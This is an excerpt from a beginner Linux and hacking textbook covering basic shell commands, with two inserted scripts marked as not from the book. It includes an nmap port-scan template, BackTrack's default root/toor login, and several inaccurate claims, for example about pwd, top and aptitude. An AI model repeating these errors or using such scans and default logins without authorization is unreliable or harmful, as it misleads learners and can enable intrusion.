www.fullengineeringbook.net
Linux, Programming and Hacking for Beginners

By J.J. Kane

Linux, Programming and Hacking for Beginners
Copyright © 2016 by James Piggott
ALL RIGHTS RESERVED.

First Edition November 2016


Kindle Edition.
ASIN: B01N0CF3L5

Published by SciFiEmpire.net Publishing

This book contains some references to fiction. Names, characters, places and
incidents are either the product of the author’s imagination or are used
fictitiously, and any resemblance to any actual persons, living or dead, events,
or locales is entirely coincidental. The publisher does not have any control
over and does not assume any responsibility for author or third-party websites
or their content.

Special Thanks
To the readers of HackForums.net, Tweakers.net and StackOverflow.com for
their contributions. Their efforts to answer my questions, debug my code and
fact-check everything I wrote were invaluable and made writing this textbook a
learning experience in itself.

Amsterdam, May, 2016.

About the Author
J.J. Kane holds a master’s degree in Computer Science. During his college
years he frequently worked as a Teaching Assistant for courses on
Programming, Managing Big Data, Data Science and Machine Learning. Since
then he has worked as a Data Scientist for the consulting company Cap Gemini and
for KLM on detecting passenger behavior through Machine Learning. He has
also worked as a Software Engineer for the E-Balance project, which aims to
create an electricity balancing application. In his spare time, he enjoys writing
science fiction, blogging about science fiction, playing and creating computer games
and writing tutorials on all sorts of obscure Computer Science topics.
So how did this textbook get started?
First, learning how to use Linux and its command line is not easy. Neither is
programming or Penetration testing, also known as hacking. To a lot of
beginners, it feels like something you either know or don’t know, and what is
worse is that you probably have no idea how to learn any of it. For me it took
the better part of a decade to start to feel comfortable with Linux and
Programming. Even then I used my knowledge of both separately. Only together,
and with Penetration testing added, can you really survive the modern academic
and professional workplace.
So why did I decide to write this book? After giving advice and tips on Linux
for years I decided to write my advice up into short tutorials. I became the
GOTO guy, or a walking reference on Linux and its command line. Eventually
the idea fermented to write a book on Linux and Programming, which you are
going to delve into shortly. As this book originates from teaching students and
workplace professionals it was not written from an academic point of view.
Yet the tutorials I originally wrote attempted to address academic deficiencies
I encountered among students. I wanted to write an easy to understand text that
resembled a primer, but was more involved. I wanted readers to experience
Linux and Programming thoroughly so the knowledge would stick and they
would have a solid foundation to use both whenever they needed. I added the
third part of the book, on Penetration Testing, to complete the cycle. I hope
readers will thus find it an easy and yet comprehensive introduction to Linux,
Programming and Hacking!

Who is this book for?
Linux, Programming and Hacking for Beginners is an introductory book for
readers keen to quickly learn more about each of these three topics. After
reading the book and going through the examples readers will have acquired
more than just a rudimentary knowledge of each topic. This knowledge can
be applied in further education, on the job or in their own further exploration.
The first part of the book, on Linux, focuses on teaching
basic Linux commands. The second part focuses on programming. Basic
syntax, algorithms and best practices are explained using several programming
languages such as C, Java, Perl and Python, while minor coding examples in
half a dozen other languages are also detailed. The final part of the book, on
hacking, gives an overview of how to perform penetration testing to test a
system for vulnerabilities. Again the best practices are illustrated using
examples. At the end of the text the reader may not be an expert in any of these
three fields, but the knowledge adds up to a critical mass readers can
use to better judge their next step in exploring the field of Computers and
Computer Science.

How This Book Is Structured

As mentioned, this book is set up in three parts. Each part consists of about
half a dozen chapters. The chapters are self-contained, thus allowing readers to
use this text as a quick reference guide after they have read it. After each
chapter I have usually included a short chapter that details something off-topic
that I think may be cool to know. Sometimes I discuss how hacking and
programming are done (in)correctly in popular culture, while on other
occasions I discuss other, more scientific topics. These extra chapters are
intended to be fun and do not form the core of this textbook, but I hope you will
appreciate them nonetheless. Please note that any screenshots I made from movies,
games and other literature are fair use and no copyright infringement was
intended.

Conventions Used in This Book

This book is a practical guide to Linux, programming and Pen testing. Topics
are illustrated through examples that the reader could, and should, carry out.
That means typing in commands and code. To avoid confusing the reader this text
adheres to certain conventions.
The first conventions regard Linux commands. In the text they are
marked in bold. Each bold set of words is a version of a command. For
example, under the section uname in chapter 0 there are several alternative
commands described, such as uname -a and man uname. The reader can type
these commands into the terminal if they want, but the full command
sequences with optional switches (also explained in chapter 0) are described
below. Readers who open a terminal in Ubuntu will see the following text
appear.
username@ubuntu:~$
The commands in this text can be entered after the dollar sign.
username@ubuntu:~$ uname -a

Alternatively, users of Linux could see the hash character ‘#’ instead of the
dollar sign ‘$’. These users have root access to their system and are allowed
to enter any command. For the most important commands in this text I have also
provided screenshots to illustrate their effects.
During part 2 of this text programming is explained. The reader can copy
programs directly from the text by using the Control-C (copy) and Control-V
(paste) hotkeys, or they can type in the programs. If you do the latter, you will
quickly develop the muscle memory needed for programming. Program
code is styled differently from Linux commands and the surrounding text. The
font has been changed to Courier and the code is indented. Various parts of the
code are color coordinated. This is syntax highlighting and is provided by
some text editors. It adds no functionality but it does keep the code readable as
your programs grow in size. Below is some pseudo code to illustrate this.
Begin program
Print out text “Hello, world!”
Ask for text input
If input is equal to “Hello to you as well”
Then print out text “Goodbye” 5 times
Return
End Program

The pseudo code I wrote is mostly nonsense; there is no computer programmed
to understand it. However, it does resemble the way programs are written. Let
it give you a feel for the logic that underlies programs. After you have typed
the code into a text file with the file extension befitting that programming
language you still have to command the operating system to execute it. These
steps are essentially Linux commands. By the time you get to part 2 of this
book you will be a pro when it comes to commands. Nonetheless, the
necessary commands to execute each program are provided.
The final part of the book, on Penetration testing, does not introduce any major
conventions. All actions are commands to be entered into the Terminal. If a
command has a component written in italics then the reader may enter their
options, depending on the rules written in the text. An example is illustrated
below.
root@kali:~# nmap -sT -p- -PN IP-address

Here the port scanner application nmap is run. Various options have been
added but the user may enter an IP address of their own choosing as the
intended target. Just be sure to have permission from the owner of the target
computer to perform the scan.

Digital Content & Source Code


Readers can download the program code directly from this website. Provide
link to GitHub account.
Please use the issue functionality to communicate any bugs, typos and
questions.

Table of Contents
Part 1. Linux and the Command Line
Chapter 0. Introduction to Linux
Chapter 1. The Basics
Chapter 2. Linux File Operations
Chapter 3. Advanced Linux Commands
Chapter 4. Text Editors and Desktop Environments
Part 2. Programming
Chapter 1. Beginning Programming with Python
Chapter 2. Shell scripting and using Shell as a programming language
Chapter 3. C memory management and pointer variables
Chapter 4. Object-oriented design with Java
Chapter 5. Algorithms with Perl
Part 3. Hacking
Chapter 0. On Hacking
Chapter 1. Reconnaissance
Chapter 2. Scanning
Chapter 3. Exploitation
Chapter 4. Wireless hacking
Chapter 5. Path Traversal
Chapter 6. SQL Injection
Chapter 7. Cross Site Scripting

Extra articles
Analysis of commands used in Tron Legacy
The Matrix Series and a CMD Tutorial
Hackers and some PowerShell
Git and GitHub tutorial
Swift – Apple’s hot new programming language
FORTRAN – the old one that doesn’t want to die
A brief history of programming languages
Make – compile your code the easy way
The Net – how not to hack
Sneakers – besides the digital realm
Mr. Robot – the new era of surveillance
Neuromancer + other popular culture
WarGames – nostalgia for BASIC
Part 1. Linux and the command line

Chapter 0 Introduction to Linux

What is Linux?
Linux was developed by Linus Torvalds during the early 1990s as an
Operating System that wouldn’t be bound to the restrictive licensing imposed
by other so-called Open-Source systems based on UNIX. Linux refers to the
kernel used by operating systems such as Ubuntu, Kali, Mint and many others. The
applications that come with the Linux operating system are part of GNU (which
stands for GNU’s Not UNIX!). The GNU project provides source code
compilers, desktop environments, text editors and many other applications as
Open-Source software. A Linux kernel and any software from GNU can be
used to create a new Linux OS, also known as a distro (distribution). So far
several hundred Linux distros are in use. The Linux kernel and the GNU
packages taken together truly form Linux and they are, less frequently, referred
to as GNU/Linux.

Interfaces
Linux comes with two types of interfaces for users. The desktop environment
or Graphical User Interface (GUI) is the one you are probably familiar with.
You can use your mouse to click on icons to start applications or navigate
through a directory. The Linux GUI is based on the X Window System (X11), which
runs a server, X.Org, that maintains the desktop environment. Windows uses the
Desktop Window Manager in a similar fashion.
However, the true strength of Linux comes from the use of the Command Line
Interface (CLI). Proper use of the CLI allows users to quickly run tasks in
succession and perform searches, maintenance and development that wouldn’t
be possible with the GUI. If you bought this book then you expect to learn more
about the CLI to do just that.

Why use the CLI at all?
Chances are you’re unhappy about abandoning the GUI. Perhaps you have been a
lifelong user of Windows who considers the command line or CMD to be a
thing of the past. You may be thinking that ‘if you can’t open a program without
double-clicking on an icon it is not working properly’. Windows does indeed
offer a slick interface (especially Windows 7 and 10, not counting 8). It is
responsive and good looking. In comparison the interface of Ubuntu, called
Unity, is a bit of a disaster. The hideous launcher on the left and the task bar at
the top seem to have been developed to make life more difficult. There are
alternatives. Kali Linux, used for Penetration Testing, and Linux Mint are two
examples with interfaces that can be customized to appear similar to Windows.
Nonetheless, clicking on icons in Linux often feels sluggish. It is time to
unleash the power of the Command Line Interface!
A CLI is a pure text terminal similar to CMD on Windows which accepts only
text arguments. Ubuntu and other Linux versions using the GNOME
environment (including Kali and Mint) use the Terminal. You can find the
Terminal in Ubuntu by searching for it after clicking the top most icon on the
launcher. With the Terminal you can execute commands and programs, add
additional options to them and even chain commands together to instantly
perform difficult tasks.

Figure 1 Ubuntu GUI with one Terminal open

Most Linux distros come with Bash, or Bourne Again Shell, installed, which is
both a shell and a command language that communicates with the operating
system. It essentially interprets what the user writes in the Terminal. The overview
below shows the relation between a Linux system, the GUI on the right and the
CLI on the left.

Figure 2 the command line as an alternative to the GUI

Superuser
Not everybody on Linux can perform every task. Only an administrator with
root access can perform potentially adverse system commands. On most Linux
distros the first user is ordinarily the Superuser with root access. Ubuntu is
unique in that it prevents users from making mistakes by denying them access to
root by default. In the command line you can type the following command to
change this.
username@ubuntu:~$ sudo su
After which you will be prompted for the password you entered when you
installed Linux. A correct password will see the sign $ replaced with #. You
now have Superuser status. Users of other Linux distros such as Kali have
this status by default. You can revert to a regular user by typing in exit; do so as
soon as the administrative task is done, since every mistake made as root affects
the whole system.

Basic system commands
We start with two simple commands: whoami and uname. As you may guess
they reveal the username and other information, which can be handy if you are
using a Linux system but are not familiar with the flavor.
whoami
Typing the command whoami in the terminal will return the username of the
present user. If you’re using the system as the root user the Terminal will print
root. Most Linux commands have a selection of options called
switches that can be added. To find out what these switches are for whoami
you type man whoami in the command line. The manual for the command
whoami is then printed in the terminal. To return to the Terminal just press q
for quit. But if you stick around and use the PgUp and PgDown keys you can
navigate through the manual and discover that whoami has two possible
switches that can be added. whoami --help shows a brief guide and informs
users where they can report possible bugs. whoami --version shows that the
command is actually a little program written by Richard Mlynarik and that it is
licensed under the GNU GPL version 3, which allows free distribution and
alteration.

Figure 3 whoami command examples
uname
With the command uname you can discover what operating system you are
running. At least that is what the vanilla command returns. If you look at man
uname you see there are about a dozen switches that return information like the
Linux kernel you are running, the processor of your system and the hardware
platform. The command uname -a prints everything. Let’s analyze what
uname -a returns.

username@ubuntu:~$ uname -a

My output is as follows.

Linux ubuntu 4.2.0-18-generic #22-Ubuntu SMP Fri Nov 6 18:25:50 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux

This tells us that my computer’s name is ubuntu. Linux ubuntu 4.2.0-18-generic
tells us that the current OS implementation uses version 4.2 of the
Linux kernel, and the x86_64 fields tell us that it runs a 64 bit version of the OS.
The fields appear in the order of the individual switches: kernel name (-s),
hostname (-n), kernel release (-r), kernel version and build date (-v), machine
hardware (-m), processor (-p), hardware platform (-i) and operating system (-o).

The Linux file system
Everything in Linux is a file, including system configuration settings. So it is
important to use the CLI to get the lay of the land. You may have already
clicked through the file system of your Linux OS and discovered directories named
/sbin, /var, /usr, /bin and a slew of others. There is method to this madness.
Below is a graph with the basic file structure of a Linux distribution. At the top
is root or /. You cannot navigate any further back.
The root directory contains all the system sub-directories. Most are of no interest for
regular Linux use. However, folders with acronyms for names, such as bin and sbin, are.
Bin stands for binaries and these are files you can execute. The following
folders with bin in their names are of interest.
/bin - contains the basic commands used in the early boot stage. Examples
include ls (list files) and cat (display and concatenate file contents), which are
used for everyday tasks.
/sbin - contains binaries of commands used only by the superuser.
Examples include reboot, poweroff, shutdown and many more.
/usr/bin - primary directory for executable commands.
/usr/sbin - contains programs not under direct control of the user.
/usr/local/bin - this folder can be used by the user to store scripts and
install binaries.
We can easily use the command line to navigate to these folders and see for
ourselves what they contain. For that we will use commands such as pwd, ls
and cd, which are the topic of the next section.

Directory Operations
The following commands, ls, pwd and cd, can be used to see what files
and folders are located in a directory. The final command explained in this
chapter is tree, which may not be installed on your system, but the command to
install it is!
ls
This command will list all the files and folders that are contained in the folder
that you have navigated to. If you add the switch -l (lowercase L) you will see
a detailed list with file permissions and file sizes. Thus the most common
variant of the list command is ls -l. The columns have the following meaning.
The first deals with the file permissions; it shows what rights the root user,
group users or guest users have. A value such as 4096 is the file size in bytes. And
the date column states the date of creation or last alteration. With the switch -a
users can view hidden files.

Figure 4 using the list command (ls -l -a)

pwd
The command pwd prints your present location in the file directory to the
command line. It is excellent for finding your way.
username@ubuntu:~$ pwd
If you open a Terminal and use pwd you should see /home as output, or /root on
other distros.
cd
The command cd, which stands for change directory, allows the user to move through
the folders of a directory without the use of their mouse. In Linux you start out
in the root folder or home folder when you open a terminal. If you were to right
click on a file in Desktop (note the upper case) you find under location the
folder directory: /home/username/Desktop.
To open a file in Desktop with the Terminal you can either type in the entire
directory plus the filename every time you access it or you can move to the
folder with the following command.
username@ubuntu:~$ cd Desktop/
Note that the forward slashes are essential. If you want to move to a folder
located in a different part of the file system you must start the path with a forward slash. To
move all the way back to where you started just type in cd. This will take
you back to the root (home) folder. If you want to move back one branch of the
directory use cd ..
username@ubuntu:~$ cd ..
Note there is a space between cd and the two dots ..

Figure 5 examples of using change directory

tree
The list command is a fine command if you want to view the contents of a
folder, but if you don't exactly know the layout of your folder structure or don't
know where you stored a file then using the mouse to browse and visually
search through all the folders will be faster than using the list command. Yet, it
would still be tedious. Instead try the tree command.
username@ubuntu:~$ tree
Chances are you will just see the disappointing message that the command was
not found. Tree is a program that is not installed on every Linux distro. Ubuntu
may have it but many others do not. Don't despair. Just type in the following to
install tree.
username@ubuntu:~$ sudo apt-get install tree
By using tree you can get an overview of all the files and subfolders of a folder.
If there are too many use the switch -d to view just folders (d for directory).
Use man tree to view the long list of other possible switches.

Repositories
With apt-get the user is accessing remote repos with the Advanced Packaging
Tool or APT. It allows users to retrieve and update software packages. Up
until the late 90s Linux was distributed on CD-ROM, but as the operating
system became more popular it was becoming problematic to include every
piece of software that may be used.
Using online repositories was the answer. The Debian flavor of Linux uses
dpkg to handle binary packages (.DEB). However, dpkg is very low-level
and outside our scope. A replacement for Debian is aptitude with its apt-get
command. Aptitude acts as a front-end to dpkg. Yet on systems such as
Ubuntu users can also use graphical interfaces to install software (Ubuntu
Software Center).
In contrast to dpkg there is also rpm, originally from Red Hat Linux, with its
Yum front-end. Fedora is an operating system that uses Yum; another is Red Hat
Enterprise Linux, of which CentOS is a popular flavor.

Chapter 1. The Basics
This chapter will show you the Terminal commands that will allow you to find
your way around a Linux operating system. Chances are that over 50% of all
the commands you will ever type are those that are described in this chapter.
Knowing these well ensures you can learn other advanced commands and
switches with greater ease.
This chapter starts with folder operations: it shows the reader how to create
and remove folders, how to copy files and how to find files on your system.
The second section discusses process operations: how to find running
processes and discontinue those processes. The final section describes
commands for common tasks such as rebooting your system, clearing your
Terminal screen and, if necessary, starting the GUI of your operating system if it
won’t start on its own.

Folder Operations
Now that you can list all the files in a folder and even view the entire folder
structure of your system it is time to perform basic folder tasks without the aid
of a mouse. Be careful with the command rm (remove), as you may remove files and
folders you need later on. Use the command tree to view
all files in any subfolder before using remove.

mkdir
You can easily make folders in Linux to store your files in an orderly fashion.
The mkdir command, or make directory, allows you to create a new directory
(folder) in the folder you have presently navigated to. The following example of the mkdir
command will create a folder called testfile inside the root (home) directory.
username@ubuntu:~$ mkdir testfile

If the folder already exists you will get an error message saying “cannot
create folder, folder already exists”. For example, if I start the terminal I am
located by default in the home (root) folder; if I were to try and create a folder
called Desktop I discover that it already exists.
username@ubuntu:~$ mkdir Desktop

Don’t forget that Linux is case sensitive, so if I were to type in the command
mkdir desktop a new directory called desktop will be created alongside the
already existing Desktop folder.

Figure 6. An example run of the mkdir command

The mkdir command is easy to use and allows users to store files in an
organized manner. I suggest readers make ample use of it.

rm
With the command rm you can remove files and folders, at least if you have
permission to do so. To perform the command simply type in rm filename.
However, the command is insufficient to remove folders. To remove folders
add the switch -r. For example, I created a new folder called testfile in my
home (root) directory. I can only delete it with rm -r testfile. Be sure that you
really want to remove a folder, because all of its contents will also be deleted.
username@ubuntu:~$ rm -r testfile

The switch -r stands for recursion. This means rm will check the folder and all
of its subfolders until it reaches the bottom. It will then delete the files in that
folder, go up one folder location and then delete the now empty sub folder. This
process continues until all content of a folder and the folder itself are deleted.

Figure 7. The RM command detailed

Be careful with the command rm -r. It DELETES a specified folder and its
contents no matter what! There is no recycle bin on the command line.

cp
The command cp stands for copy. It allows you to copy files from one folder to
another. Below is an example of the use of cp. The first part of the command
determines the location of the file we want to copy. In this case the file is
located in /home/user/Downloads. This part is followed by the name and
extension of the file we want to copy (test.txt). The last part of the command
determines the location where the file is to be copied to (/home/user/Desktop).
username@ubuntu:~$ cp /home/user/Downloads/test.txt /home/user/Desktop
If I am already located in the directory to which I want to copy the file or
folder I can just type in a dot ‘.’ as the destination. By extension, if you want to copy the entire contents
of a folder use the wildcard * instead of the filename.
username@ubuntu:~$ cp /home/user/Downloads/* /home/user/Desktop
The above example uses the wildcard to copy ALL files in the folder
Downloads to the folder Desktop.

Figure 8. Variations of the CP command

In the screenshot above I demonstrate two methods of using cp. In the first I use
the full folder location of both source and destination. In the second I
use just a dot ‘.’ for the destination after I have navigated to the folder
Desktop. Note that I also made mistakes. First I tried to auto-complete the
source location but Ubuntu reminded me there are three sub-folders in that
directory starting with a capital D. Below that I failed to enter the destination
folder and thus the command was not carried out.

mv
With mv (move) a file can be cut to a new directory. It is similar to dragging a
file or folder or using the ‘cut and paste’ option, in that once the file is copied
to the new location it is deleted from the old location.
username@ubuntu:~$ mv /home/user/Downloads/* /home/user/Desktop
Other than that mv is similar to cp. You can again use the wildcard to move
more than one file or folder at a time.

grep
The grep command allows you to find files that contain a specific string of
text. It is thus similar to the Windows function ‘Search programs and files’. As
traversing manually through the folders of a Linux operating system is tedious it
would be helpful if we knew where to look for a specified file containing the
text we are looking for.

username@ubuntu:~$ grep "world" world.txt

In this example we look for the string world in the file world.txt. You can
specify if you want to look through just one file or through all the files found in
the folder and its subfolders. As you may have surmised from the previous
command you can again use the wildcard * expression.

Grep is very multifunctional. It can easily be combined with other commands
and chained together to perform some very complicated tasks. Users also need
to remember that Linux is case sensitive. If all instances of ‘world’ start with a
capital W the grep command above won’t find any. The -i switch makes grep
case insensitive.

username@ubuntu:~$ grep -i "world" world.txt

As I mentioned, grep can be used in conjunction with other commands. An
example would be the ls command.

username@ubuntu:~$ ls | grep 'world'

In the above example ls is executed first and its output is fed into the grep
command through the use of the vertical bar ‘|’, called a pipe. Pipes will be
explained in detail in chapter 3, but they will be used sparingly before that.

Grep also has the option to look for a partial word match. Since grep looks for the
pattern anywhere in a line, searching for ‘orl’ finds every name in which those three
characters appear, whatever precedes or follows them; in regular-expression terms
‘anything before and after’ is written .*orl.* rather than with the shell wildcard *.
Put the pattern in quotes so the shell does not expand a bare * against the
filenames in the current folder before grep ever sees it.

username@ubuntu:~$ ls | grep -i 'orl'

The example above searches case insensitively for the sequence of
characters ‘orl’ within the list of files within that particular
folder. In this case the output would return a list of just one file.

Figure 9. LS combined with regular expressions

Grep stands for global regular expression print and it makes use of regular
expressions to evaluate what tasks it should perform. Regular expressions are a
standard that define the sequence of characters in a text that need to be
operated on. With grep we search for a number of characters matching a
pattern. Regular expressions will be discussed in detail in a later chapter.
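The grep behaviour described in this section, as an added example that is not from the book: the functions below run grep on sample files constructed in a temporary directory, show what -i and -r -l add, and demonstrate what actually happens when the pattern in ls | grep -i *orl* is left unquoted. Only the file names and their contents are invented; the commands are plain grep, ls and sed.

```shell
#!/bin/sh
# Added example, not from the book. Sample files are constructed here in a
# temporary directory so the script runs offline; nothing else is assumed.

demo_dir=$(mktemp -d)
trap 'rm -rf "$demo_dir"' EXIT
printf 'Hello, world!\nHELLO WORLD\nnothing to see\n' > "$demo_dir/world.txt"
printf 'another World\n' > "$demo_dir/hello_world.md"
printf 'no match in here\n' > "$demo_dir/other.log"

# Lines in file $2 containing pattern $1, case-sensitive (the book's grep "world" world.txt).
count_matches() {
    grep -c -- "$1" "$2"
}

# The same with -i: 'world' now also counts 'WORLD' and 'World'.
count_matches_ci() {
    grep -ci -- "$1" "$2"
}

# Names of the files under directory $2 that contain pattern $1 (case-insensitive).
# -r recurses into subfolders, -l prints only the file names, not the matching lines.
files_containing() {
    (cd "$2" && grep -ril -- "$1" . | sed 's|^\./||' | sort)
}

# An unquoted *orl* is expanded by the shell against the current directory
# BEFORE grep starts. This prints the words grep would actually receive.
glob_expansion() {
    (cd "$1" && set -- *orl* && printf '%s\n' "$@")
}

# The book's command with the pattern left unquoted. With two matching file
# names it turns into "grep -ci hello_world.md world.txt": search the FILE
# world.txt for the TEXT hello_world.md. The piped ls output is never read.
unquoted_count() {
    (cd "$1" && ls | grep -ci *orl*)
}

# Quoted, the pattern reaches grep intact. grep already matches substrings, so
# 'orl' is enough; the regex spelling of "anything around it" would be '.*orl.*'.
quoted_count() {
    (cd "$1" && ls | grep -ci -- 'orl')
}

main() {
    echo "grep world world.txt     -> $(count_matches world "$demo_dir/world.txt") line(s)"
    echo "grep -i world world.txt  -> $(count_matches_ci world "$demo_dir/world.txt") line(s)"
    echo "files containing world   -> $(files_containing world "$demo_dir" | tr '\n' ' ')"
    echo "shell expands *orl* to   -> $(glob_expansion "$demo_dir" | tr '\n' ' ')"
    echo "ls | grep -ci *orl*      -> $(unquoted_count "$demo_dir") name(s)"
    echo "ls | grep -ci 'orl'      -> $(quoted_count "$demo_dir") name(s)"
}

main
```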

Process Operations
If you find yourself in difficulty with having started an unwanted program or if
one is using up too much memory you may want to discontinue it. The
commands ps and kill can help.

ps
With the ps command a list of all currently running processes is printed onto
the terminal. The command is very useful in gauging the current resource usage
and seeing what programs are hogging all the memory and CPU cycles. Use the
switch -ef to generate a list of all processes currently running without
overflowing you with information as -l would[1].

username@ubuntu:~$ ps -ef

The command can also be combined with grep. If you want to find a particular
process but you can’t find it you can use the pipe | followed by grep
stringtosearchfor. The latter stands for the string that you think the process
may be called after. An example to find bash is

username@ubuntu:~$ ps -ef | grep bash

Figure 10. PS combined with regular expressions

top
A simple command that will show all processes, even those not running, is top.
With top you may well end up with a very lengthy list of processes, but at the
top of the output there is plenty of information to determine what your system is
doing.

username@ubuntu:~$ top

To end top press C-c (Control-c).

Figure 11. example output from running Top

kill
With the command kill you can end any process. You will have to know its
number, which you can find with ps. The kill command is considered
somewhat overkill. The switch -9 guarantees the process will be terminated: it
sends the KILL signal, which the process cannot catch or ignore, so it also gets
no chance to save its work or clean up. Plain kill without a switch sends the
gentler TERM signal and is the better first attempt.

username@ubuntu:~$ kill -9 processnumber

As an example open a second terminal window and run the top command. With
ps you can easily search for the top process as follows

username@ubuntu:~$ ps -ef | grep top

In the second column of the output, entitled PID, there are numbers next to the
processes that were running. Note that the grep command itself also appears in
this list, since its own command line contains the word top. With these numbers
you can kill a process. As an
example, top has number 5414 when I ran it. So the kill command would be
executed as follows

username@ubuntu:~$ kill -9 5414

Figure 12. The kill command with the -9 switch
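The procedure just described (find the process with ps and grep, read off its PID, end it with kill) as one script. This is an added example, not code from the book: the background sleep process, its unusual argument, and the function names are my own, chosen so the script runs without a second terminal. It reads the PID with ps -o pid=,args= instead of -ef so the columns it parses are fixed on every ps; the chapter's ps -ef works the same way with the PID in the second column. It also shows a pitfall the screenshot hides: grep matches its own process too, because the search string appears on grep's own command line.

```shell
#!/bin/sh
# Added example (not from the book): locate a process by name the way
# ps | grep does, read off its PID, then end it with kill and confirm it is gone.
# A background "sleep" with an unusual argument stands in for the second-terminal
# "top" used in the text.

# Start a long-running process in the background; the shell puts its PID in $!.
start_victim() {
    sleep 314159 &
    VICTIM_PID=$!
}

# Print the PIDs of all processes whose command line contains $1.
# ps -ef shows the PID in column 2; -o pid=,args= asks for only the PID and the
# command line, in that fixed order, so the parsing is the same on every ps.
# "grep -v grep" drops the grep process itself, which otherwise matches too
# because its own command line contains the search string.
find_pids() {
    ps -eo pid=,args= | grep -- "$1" | grep -v grep | awk '{print $1}'
}

# End a process with the default signal (TERM) and verify it is gone.
# kill -9 (KILL) is the last resort: it cannot be caught or ignored, so the
# program gets no chance to save state or remove temporary files.
# kill -0 sends no signal at all; it only reports whether the PID still exists.
stop_process() {
    pid=$1
    kill "$pid" 2>/dev/null || return 1
    wait "$pid" 2>/dev/null || true   # reap our own child so no zombie lingers
    for attempt in 1 2 3 4 5; do
        kill -0 "$pid" 2>/dev/null || return 0
        sleep 1
    done
    return 1
}

demo() {
    start_victim
    echo "shell reported PID $VICTIM_PID"
    echo "ps/grep found PID(s): $(find_pids 'sleep 314159')"
    stop_process "$VICTIM_PID" && echo "process $VICTIM_PID has ended"
}

demo
```

Running it prints the same PID twice, once from the shell and once from the ps pipeline, and then confirms the process is gone; searching again afterwards returns nothing.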

Basic household tasks
The final six commands discussed in this chapter are used for regular
household chores you can do from the command line. They allow you to start the
Graphical User Interface of the operating system if it has not started yet,
reboot your computer or shut it down (for a cold reboot), and clear a Terminal
of your commands and their output.
startx
The command startx is a shell script that starts the X Window System, so you
have a Graphical User Interface to work with if you want one. Before there was
Kali Linux for penetration testers there was BackTrack, which by default did
not start the GUI. After logging in with username 'root' and password 'toor'
you had only a Command Line Interface (CLI). The startx command started the
GUI if you did not feel comfortable working with just a CLI. Stripped-down
Linux systems used on embedded devices often provide only a CLI, with a
command toolset such as BusyBox.
reboot
After making changes to the software of an OS you usually reboot the system,
or it asks you to. You can also do this from the terminal with the simple
command reboot. As there are many Linux flavors that do not have a GUI it is
vital to know this and the next command, shutdown. Also, if you mess up your
OS and think a reboot would fix whatever you did wrong, this command is a life
saver. There is no great mystery here, just type in reboot.

username@ubuntu:~$ reboot
shutdown
Just like reboot there is also a command to simply switch off your computer,
and that is shutdown. Just as with reboot, the GUI actually carries out a
similar command when you click the shutdown button. Like reboot, the command
will come in handy when you do not have a GUI at your disposal. Both commands
can also be used somewhat nefariously by those who gain entry to other
people's systems. Think of a program that orders the system to shut down every
hour or so, just for laughs.

username@ubuntu:~$ shutdown

history
Another useful tool is the command history, which prints all the commands you
have entered, such as those in this chapter, to the Terminal. It is useful to
check what you have done without seeing the output of previous commands; it
prints only the commands. history has many possible switches, but they are
intended for more advanced Linux users and are outside the scope of this
text. Have a look at the manual to see examples of possible switches.

username@ubuntu:~$ history

You can view the logged commands with history even after you have rebooted
the system.

Figure 13. history shows the latest commands used

clear
To clear the Terminal of all commands and command output just type in clear
and you get a crisp clean Terminal, as though you had just started one. You
can still use history to view all your previous commands. Viewing the manual
for clear reveals it has no switches.

username@ubuntu:~$ clear

A second way to clear the Terminal is to press Control-L. Such Terminal
hotkeys will be explained in greater detail in chapter 4.

exit
To end a Terminal window just type in exit. Viewing the manual for exit
reveals it also has no switches.

username@ubuntu:~$ exit

Summary Chapter 1
This chapter introduced a number of commands around basic themes such as
file operations, process operations and basic household tasks. At first there
may not seem to be much gain in performing file operations with the Terminal
compared to using a mouse. However, if you are serious about learning more
about Linux then you stand a good chance of being confronted with an
installation that has no GUI, or where you are required to use the command
line to communicate with another Linux machine through a service such as
SSH. If you want to copy files to and from other systems you will have to use
cp, rm and grep.
For the same reason it is important to learn other commands such as ps to
search processes and kill to end them. Startx, reboot and shutdown allow you
to perform actions to get out of trouble as it is often unwise to pull the plug on
a Linux system for fear of ruining its filesystem. I thought it prudent to learn
these commands before tackling more difficult ones in the upcoming chapters.
With history and clear you manipulate the output of the Terminal to make sure
you can still see the woods through the trees.
A word of note: the up and down arrows allow you to re-select previous
commands. I also briefly showed you how to combine commands. Note the pipe |
between the ps and grep commands. With it we piped the output of the command
on the left into the one on the right. Finally, with the command exit you
learned how to neatly close a Terminal window.
Don't worry if the list of commands seems overwhelming. I picked this list
because they are the most frequently used and are often used in conjunction
with each other. Some commands such as startx, reboot and shutdown are
exceptions, and most of the time those actions will be carried out with the
mouse. Yet I consider them necessary for when you are in difficulty.
Now onto less meaty stuff with the first EXTRA chapter of this book!

Figure 14. Olivia Wilde as Quorra

EXTRA:
Tron Legacy command line:
Explained
Reading endless chapters about Linux, commands and programming concepts can
quickly become tiresome. I find it can quickly cause skepticism, leaving a
reader to question whether what they are learning is really helpful. A long
time ago I read a book on the Java programming language called Just Java, by
Peter van der Linden. The book was written in somewhat daunting prose, but at
the end of every chapter he would include a paragraph on a light-hearted
topic. Sometimes it would have little to do with programming. In this book I
do the same thing. My goal for writing this book is to quickly pull away the
veil around Linux, Programming and Hacking.
So I decided to show you how each is done in popular culture.
Software engineers and hackers have an affinity with movies, games and novels
about science-fiction, spy craft and thrillers. Nearly each chapter has a
concluding part that clarifies how Hollywood gets it right or wrong. A few
other chapters will have short articles on a technical topic. They may not be
necessary to understand what is written in this book, but they are
interesting and helpful to know. To conclude the first chapter, an analysis is
made of the 2010 movie Tron Legacy from director Joseph Kosinski.

Figure 15. Garrett Hedlund as Sam Flynn
You all know the setting!
Grumpy middle-aged man gets out of prison and decides to perform one last
heist. He enlists the help of a crack team of hackers, lock pickers and
scammers to get the job done. When the hackers try to get into the impossibly
secure system they, illogically, use a GUI hacking tool. I suppose Hollywood
thinks it is necessary to hide as much of the tech stuff as possible so as not
to confuse the audience. As you may already know, such tools in real life
either don't exist or are a watered-down version intended for script kiddies
who can't work with an actual command line. Not so in Tron Legacy! Granted,
it's not a heist movie, but the creative staff at least took the effort to
make the use of computers look as authentic as possible.
Tron Legacy is the sequel to the 1982 cult classic Tron, which starred Jeff
Bridges as whiz programmer Kevin Flynn and Bruce Boxleitner as his co-worker
Alan Bradley. It was directed by Steven Lisberger. Both actors have returned
for the sequel, but it is Garrett Hedlund who takes the lead as Sam Flynn as
he tries to uncover what happened to his father after his disappearance in
1989. Only Alan suspects that Kevin entered the computer world as he did in
the first movie. At his father's arcade Sam finds his father's computer
connected to the laser that allows him access into the digital world called
the GRID.

